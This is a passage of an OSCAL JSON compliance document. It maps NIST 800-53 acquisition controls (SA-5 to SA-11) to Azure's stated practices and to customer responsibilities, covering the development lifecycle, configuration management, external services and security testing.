statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5e0d3a8f-b68d-416a-959e-1cb153d6aa39","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-5_smt.d","by-components":[{"uuid":"a0de51cf-f272-421c-93e4-635cb5a42c57","export":{"provided":[{"uuid":"548fc5d1-5a70-4a43-86d4-4b84fd074666","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-035"}],"description":"Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding:_x000D_ _x000D_ * Secure configuration, installation, and operation of the information system_x000D_ * Effective use and maintenance of security features/functions_x000D_ * Known vulnerabilities regarding configuration and use of administrative (i.e. privileged) functions_x000D_ _x000D_ This documentation is stored in each service team's SharePoint site and made available to service team members. The documentation is secured via SharePoint's internal security mechanisms. 
Information system documentation is distributed to only the appropriate groups and individuals on a need to know basis and is based on job responsibilities._x000D_ _x000D_ Documentation for externally-provided software (scanning tools) is available online at vendor websites._x000D_ _x000D_"}],"responsibilities":[{"uuid":"11329c66-816a-4348-83d7-1d71b51c148d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-035"}],"description":"The customer is responsible for protecting administrator and user documentation for customer-deployed resources.","provided-uuid":"548fc5d1-5a70-4a43-86d4-4b84fd074666"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"009694ad-8dde-4446-8633-510983046716","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-8","statements":[{"uuid":"63647249-eff4-467a-a186-a20e42e6266f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-036"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-8_smt","by-components":[{"uuid":"448cde55-2cf4-41bc-8612-375341fe2b75","export":{"provided":[{"uuid":"805178dc-b0a0-40a1-a613-df51edeae800","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-036"}],"description":"Azure has a mature Security Development Lifecycle (SDL) process that is followed for all engineering and development projects. 
The Microsoft SDL process includes the following phases which implement standard security and privacy engineering principles across all of Microsoft's online services: * Phase 1: Requirements - The Requirements phase of the SDL includes project inception, when the organization considers security and privacy at a foundational level, and a cost analysis, when it determines whether development and support costs for improving security and privacy are consistent with business needs. This phase also includes defining security roles and responsibilities and identifying individuals with these roles and responsibilities. * Phase 2: Design - The Design phase is when the organization builds the plan for how to take the project through the rest of the SDL process, from implementation to verification to release. During the Design phase the organization establishes best practices to follow for this phase by way of functional and design specifications, and by performing risk analysis to identify threats and vulnerabilities in the software. TMA (Threat Model Analysis) is required to define all attack surfaces and their associated risks; all security gaps and risks are documented and analyzed. This security impact analysis results in dataflow documentation in order to identify all intended paths for information and potential attack vectors. * Phase 3: Implementation - The Implementation phase is when the organization creates the documentation and tools the customer uses to make informed decisions about how to deploy the software securely. To this end, the Implementation phase is when the organization establishes development best practices to detect and remove security and privacy issues early in the development cycle. 
Microsoft understands, observes, and implements the security requirements and considerations as outlined in GSA IT Security Procedural Guide 09-48, Security Language for IT Acquisition Efforts, dated September 2009 for the information system consistent with the Azure offering's requirements. * Phase 4: Verification - During the Verification phase, the organization ensures that the code meets the security and privacy tenets established in the previous phases. This is done through security and privacy testing, and a security push, which is a team-wide focus on threat model updates, code review, testing, and thorough documentation review and editing. Additionally, service teams create a Security Incident Management document as part of their SDL requirements that outlines how security-specific incidents are addressed. A public release privacy review is also completed during the Verification phase. * Phase 5: Release - The Release phase is when the organization prepares the software for consumption and prepares for what happens once the software is released. One of the core concepts in the Release phase is response planning, that is, mapping out a plan of action should any security or privacy vulnerabilities be discovered in the release; this carries over to post-release as well, in the form of response execution. To this end, a Final Security Review and privacy review are required prior to release. The SDL dashboard is used to monitor the progress of all engineering initiatives and controls the process to ensure that all steps are followed. 
The System Owner is responsible for ensuring that the SDL process is followed for all engineering initiatives associated with Azure."}],"responsibilities":[{"uuid":"c2ec0373-5b4d-4649-8a38-ea82fdf3f93f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-036"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for applying security and privacy engineering principles in the specification, design, development, implementation, and modification of customer-deployed resources.","provided-uuid":"805178dc-b0a0-40a1-a613-df51edeae800"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1f3d1f66-8fb2-4ea2-9d01-7de7529c7ccc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-9","statements":[{"uuid":"e423c96a-1d37-4552-bbb5-b75bcb947162","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-037"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9_smt.a","by-components":[{"uuid":"dbf6c0a1-c096-4713-936d-55b492f76122","export":{"provided":[{"uuid":"1da3138f-1dff-4617-8c39-8bff985c1c1a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-037"}],"description":"Azure is owned and operated by Microsoft; there are no external information system services involved in the delivery of Azure services. 
However, if Azure does utilize external information system services outside of the Azure authorization boundary, it ensures that they comply with the information security requirements. Subsequent changes are coordinated with the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required to determine whether a change signifies a major change; documentation is updated and the system reauthorized as needed per direction from the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required. Additionally, Microsoft provides deliverables to the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required as part of continuous monitoring activities allowing sufficient Government oversight. Microsoft follows the standard process outlined below in the event it does utilize services outside of the Azure authorization boundary. Microsoft engages Vendor Agencies through Microsoft's third party ordering tool, which is designed for third parties (Vendor Agencies) that have signed a Master Supplier Services Agreement (MSSA) and/or have been approved by the Global Procurement Group (GPG) as an \"Approved Vendor\" in specific categories of work. GPG requires the third party to comply with all applicable Microsoft security policies and implement security procedures to prevent disclosure of Microsoft Confidential information. Microsoft includes provisions in the MSSA and any associated Statements of Work (SOW) with each vendor addressing the need to employ appropriate security controls. 
Additionally, vendors that handle high business impact data must be in annual compliance with the Microsoft Supplier Security and Privacy Assurance (SSPA) Program Guide."}],"responsibilities":[{"uuid":"2563aeb6-ac55-4a14-a50f-88b633bc67c6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-037"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring that external service providers comply with the customer's information security and privacy requirements and employ customer-defined security controls in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance.","provided-uuid":"1da3138f-1dff-4617-8c39-8bff985c1c1a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"28e8faf0-f7e5-412a-8895-a7a7509a7107","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-038"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9_smt.b","by-components":[{"uuid":"69196a7e-86d2-442d-8ffa-e88153e54a4b","export":{"provided":[{"uuid":"4b41fdaf-403b-4cf4-b030-1afa685613da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-038"}],"description":"Azure signs ISAs with external information systems; ISAs define Azure oversight and roles/responsibilities. Agencies receive and review ISAs as part of their authorization decision. 
Government oversight is performed by this agency review of Azure ISAs and continuous monitoring, which includes reports on ISA oversight."}],"responsibilities":[{"uuid":"3939effc-c6db-4030-a37c-ebc0f5fad9e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-038"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for defining and documenting government oversight and user responsibilities and roles with regard to external system services.","provided-uuid":"4b41fdaf-403b-4cf4-b030-1afa685613da"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"44167ea2-4b8b-4110-b569-d87f071ef1d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-039"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9_smt.c","by-components":[{"uuid":"841786e0-ec81-4c64-a939-56792edc4f27","export":{"provided":[{"uuid":"11648b12-8c1d-4161-9f0b-6190b9887733","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-039"}],"description":"Azure monitoring processes, methods and techniques are applied to customer data and access control data and are documented in ISAs and executed by Azure Security."}],"responsibilities":[{"uuid":"29ba3197-2bef-4341-84bb-f62dc047b7e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-039"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for continuously monitoring external service providers through customer-defined processes, methods, and 
techniques.","provided-uuid":"11648b12-8c1d-4161-9f0b-6190b9887733"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"13eea70b-a2f2-4ff0-97b6-71193362a899","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-9.1","statements":[{"uuid":"230a7a3c-fb79-4acc-bfae-84b0978cd603","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9.1_smt.a","by-components":[{"uuid":"f34dc770-274a-4f76-9e0b-fa70d6026535","export":{"provided":[{"uuid":"bd88acff-fcea-4fa9-8b77-f8f464687a35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-040"}],"description":"Azure does not consider any information security services to be outsourced as they are defined in the supplemental guidance for the requirement. 
If any services were to be outsourced after receiving an ATO, Azure Security would complete an assessment of risk and follow change management processes."}],"responsibilities":[{"uuid":"17e33afa-08c4-4440-859b-80a6da6fbce9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-040"}],"description":"The customer is responsible for conducting a risk assessment prior to acquiring or outsourcing dedicated information security services.","provided-uuid":"bd88acff-fcea-4fa9-8b77-f8f464687a35"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7d542768-4f78-4a9d-b33d-f3814c5d79be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9.1_smt.b","by-components":[{"uuid":"28719885-fe98-4841-af3f-52d2a0c60c7e","export":{"provided":[{"uuid":"54a7e22e-a2c1-4fde-8df6-9a02187ad0a8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-041"}],"description":"Azure ensures the acquisition or outsourcing of dedicated information security services is approved by the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators."}],"responsibilities":[{"uuid":"957adcd5-0180-409a-b0dd-f04c5e369752","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-041"}],"description":"The customer is responsible for obtaining approval of acquisitions or outsourcing of dedicated information security services.","provided-uuid":"54a7e22e-a2c1-4fde-8df6-9a02187ad0a8"}]},"description":"See inheritance and customer 
responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a2ace826-5f35-4422-8f07-72dea20dc5a4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-9.2","statements":[{"uuid":"13d784a9-89d2-4346-ac3a-079ae8dee281","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9.2_smt","by-components":[{"uuid":"b85499fa-ddb0-4957-9f69-d7407815fbff","export":{"provided":[{"uuid":"c12c8861-b21c-4ce4-9eb8-dfaf4484efa7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-042"}],"description":"As part of the process of establishing a connection to an external information system, Azure requires the system to provide information about the functions, ports, protocols and other services required for the use of such services."}],"responsibilities":[{"uuid":"327655ba-3ca6-402e-a730-8b029554c03f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-042"}],"description":"The customer is responsible for requiring external service providers to identify the functions, ports, protocols, and other services required for the use of that service.","provided-uuid":"c12c8861-b21c-4ce4-9eb8-dfaf4484efa7"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5a046ee6-e04c-441e-bc27-0cc6eea1a7f3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-9.5","statements":[{"uuid":"3add5036-50a1-4b89-a9f6-849e4cc788e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9.5_smt","by-components":[{"uuid":"dcf636c4-6748-40df-ac9a-49dcaf197ac6","export":{"provided":[{"uuid":"20293eae-9bf3-4284-9efd-7c93860fb4a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-043"}],"description":"Azure restricts the location of all services and data within the accreditation boundary to Azure continental United States datacenters."}],"responsibilities":[{"uuid":"ee1461e6-cf37-4eff-ad4a-5a885223b781","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-043"}],"description":"The customer is responsible for restricting the location of information processing, storage, and services.","provided-uuid":"20293eae-9bf3-4284-9efd-7c93860fb4a7"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bc1b0b09-e5ce-469a-9b45-33f4550c8552","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-10","statements":[{"uuid":"9fd37b9a-70f9-4020-8a8c-7850edd1225d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.a","by-components":[{"uuid":"b6bd8466-47b8-4c81-b302-44422a6e15b6","export":{"provided":[{"uuid":"775c9924-54c0-48f6-8f2c-c3007a3967cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-044"}],"description":"All Azure software developers are required to follow the Azure Configuration Management Plan (CMP) and Microsoft's Security Development Lifecycle (SDL) during information system design, development, implementation, operation, and disposal."}],"responsibilities":[{"uuid":"b14bbcea-a742-4ba1-9b85-4335f1486e06","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-044"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to perform configuration management during the design, development, implementation, operation, and disposal of the resources provided.","provided-uuid":"775c9924-54c0-48f6-8f2c-c3007a3967cd"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a9d3e68a-ab79-4ef5-8b06-c710083bfd4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.b","by-components":[{"uuid":"0ba35f32-b702-4c72-80ee-fae0e8374f59","export":{"provided":[{"uuid":"b28ad258-1ec8-4256-b53d-4a28ccb63484","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-045"}],"description":"Azure developers leverage Git or Azure DevOps to document, manage and control the integrity of changes in the development environment. These tools provide technical enforcement of documented change management processes and the SDL. 
Among other features, they prevent changes to configuration items that are not tied to an approved change request."}],"responsibilities":[{"uuid":"7a6fdea2-e784-40a8-8e89-d9184b7e44d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-045"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to document, manage, and control the integrity of changes to customer-defined configuration items.","provided-uuid":"b28ad258-1ec8-4256-b53d-4a28ccb63484"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"424bbbcd-7384-4b7a-8f91-a1a48b79c7ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.c","by-components":[{"uuid":"9f06ef8e-abe9-4bb7-9ab9-4a1af32552f1","export":{"provided":[{"uuid":"f543e6e0-6351-44a6-92cb-a84622ddbdf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-046"}],"description":"Developers of Azure implement only approved changes to the system. The service teams follow the configuration management processes when implementing changes. 
Changes are approved through Git or Azure DevOps."}],"responsibilities":[{"uuid":"39698a89-21a7-451d-ad96-fb33cd395b5f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-046"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to utilize configuration management such that the developer implements only organization-approved changes to the resources provided.","provided-uuid":"f543e6e0-6351-44a6-92cb-a84622ddbdf3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3e8d3d49-066a-4f9b-9429-479a43651671","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.d","by-components":[{"uuid":"6c7784fa-9a78-4f0f-9a95-dca46bea3966","export":{"provided":[{"uuid":"325960b8-7335-4502-a918-593e18bcb15c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-047"}],"description":"The service team tracks all approved changes in Git or Azure DevOps. The software build services of Git and Azure DevOps have configurations in place to ensure the approval of changes by at least one reviewer other than the individual who developed the change prior to deployment into the Azure production environment. In addition, proper testing is conducted for the changes prior to being deployed to production. 
As part of these change management processes, other documentation such as the SSP or user and administrative documentation is updated if applicable."}],"responsibilities":[{"uuid":"e2fa304b-68d7-4ab1-84e4-0a608d058873","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-047"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to utilize configuration management and to document approved changes and the potential security and privacy impacts of such changes.","provided-uuid":"325960b8-7335-4502-a918-593e18bcb15c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"45ad0b86-0a50-4d45-ac69-3e91f8a700e8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.e","by-components":[{"uuid":"b35277b0-0f5e-4429-a3b7-3ad83853a7fe","export":{"provided":[{"uuid":"c57d355f-e28a-4681-85ea-35ec16b8c4b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-048"}],"description":"Azure service team developers track security flaws and flaw resolution during the development process using Azure DevOps. Any identified flaws, whether discovered by a human or by the automated tools, have a corresponding bug opened in Azure DevOps. The resolution of the flaw is then documented and tracked using the bug. 
A summary of identified flaws and their resolution is provided to service team management, Azure Security, and authorizing officials."}],"responsibilities":[{"uuid":"07c7adf8-0f33-477c-8668-cf222a1d7857","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-048"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to utilize configuration management, including tracking security flaws through resolution and reporting findings to customer-defined personnel.","provided-uuid":"c57d355f-e28a-4681-85ea-35ec16b8c4b5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d34eff7d-3f09-450e-87b0-b15c5dad1ea7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-11","statements":[{"uuid":"1ea6abc1-48cf-4f3d-8d15-09471f247382","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-049"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.a","by-components":[{"uuid":"dfa6df0a-a4da-421c-98ec-972f016fc329","export":{"provided":[{"uuid":"a2d65b3a-aa56-47a1-aa23-08a409401769","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-049"}],"description":"Azure develops security and privacy control assessment plans in accordance with Microsoft's Security Development Lifecycle (SDL) process. 
Security testing occurs during the following phases of the process: * Phase 3 - Implementation * Phase 4 - Verification * Phase 5 - Release"}],"responsibilities":[{"uuid":"426d9473-0493-4942-a9bc-702cb898ffcc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-049"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to develop and implement a plan for ongoing security and privacy control assessments.","provided-uuid":"a2d65b3a-aa56-47a1-aa23-08a409401769"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b803d87a-f32c-4e1d-922e-7174f1ad7475","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-050"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.b","by-components":[{"uuid":"c93a2d8d-f1e7-4d78-b18b-e599bfe781d6","export":{"provided":[{"uuid":"1d468df9-808e-4bc4-9437-396ee42ffc24","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-050"}],"description":"Azure develops security assessment plans in accordance with Microsoft's Security Development Lifecycle (SDL) process."}],"responsibilities":[{"uuid":"412c9c3f-e62d-4c5c-a3df-c6a1711cf975","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-050"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to perform unit, integration, system, and/or regression testing/evaluation at the 
customer-defined depth and coverage.","provided-uuid":"1d468df9-808e-4bc4-9437-396ee42ffc24"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dd6272a9-6c47-4e0d-bfdc-2fb40a913a00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-051"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.c","by-components":[{"uuid":"3ce062f8-1465-47d0-8984-6692e7a33e9c","export":{"provided":[{"uuid":"a534ca40-3a44-4abb-934c-814309fd4694","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-051"}],"description":"The results of the security tests are documented in tickets opened in Azure DevOps. 
Remediation work and successful retesting are documented in the same ticket."}],"responsibilities":[{"uuid":"575fd2bf-088f-4732-b4ea-af97d27aef99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-051"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to produce evidence of assessment plan execution and the results of testing/evaluation.","provided-uuid":"a534ca40-3a44-4abb-934c-814309fd4694"}]},"description":"See inheritance and customer responsibility 